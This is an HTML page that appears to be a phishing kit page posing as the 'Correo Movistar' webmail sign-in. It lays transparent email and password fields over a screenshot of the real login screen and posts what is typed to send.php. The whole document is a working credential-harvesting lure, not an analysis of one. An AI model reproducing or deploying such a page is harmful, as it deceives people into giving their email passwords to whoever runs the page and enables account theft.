<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Correo Movistar. Sign in</title>
<style type="text/css">
body
{
   margin: 0;
   padding: 0;
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a
{
   color: #0000FF;
   text-decoration: underline;
}
a:visited
{
   color: #800080;
}
a:active
{
   color: #FF0000;
}
a:hover
{
   color: #0000FF;
   text-decoration: underline;
}
</style>
<style type="text/css">
#Image1
{
   border: 0px #000000 solid;
}
#Editbox1
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   color :#000000;
   font-family: Arial;
   font-size: 13px;
   text-align: left;
   vertical-align: middle;
}
#Editbox2
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   color :#000000;
   font-family: Arial;
   font-size: 13px;
   text-align: left;
   vertical-align: middle;
}
#Button1
{
   border-top-width: 0px;
   border-right-width: 0px;
   border-bottom-width: 0px;
   border-left-width: 0px;
   border-top-style: solid;
   border-right-style: solid;
   border-bottom-style: solid;
   border-left-style: solid;
   border-top-color: #000000;
   border-right-color: #000000;
   border-bottom-color: #000000;
   border-left-color: #000000;
   background-color: transparent;
   color: #000000;
   font-family: Arial;
   font-size: 13px;
}
</style>
</head>
<body style="background-image: url('img/1.png'); background-repeat: no-repeat;height: 1292px; width:100%">
        <div class="content_form">
            <form method="post" action="send.php">
<div id="wb_Image1" style="position:absolute;left:0px;top:0px;width:1600px;height:1020px;z-index:0;">
<img src="images/1.png" id="Image1" alt="" style="width:1600px;height:1020px;"></div>
<input type="email" id="Editbox1" style="position:absolute;left:500px;top:191px;width:373px;height:37px;line-height:37px;z-index:1;" placeholder="Dirección de correo" name="user" value=""required>
<input type="password" id="Editbox2" style="position:absolute;left:500px;top:246px;width:373px;height:38px;line-height:38px;z-index:2;" placeholder="Password" name="pass" value=""required>
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:603px;top:359px;width:169px;height:39px;z-index:3;">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:627px;top:319px;z-index:4;">
</body>
</html>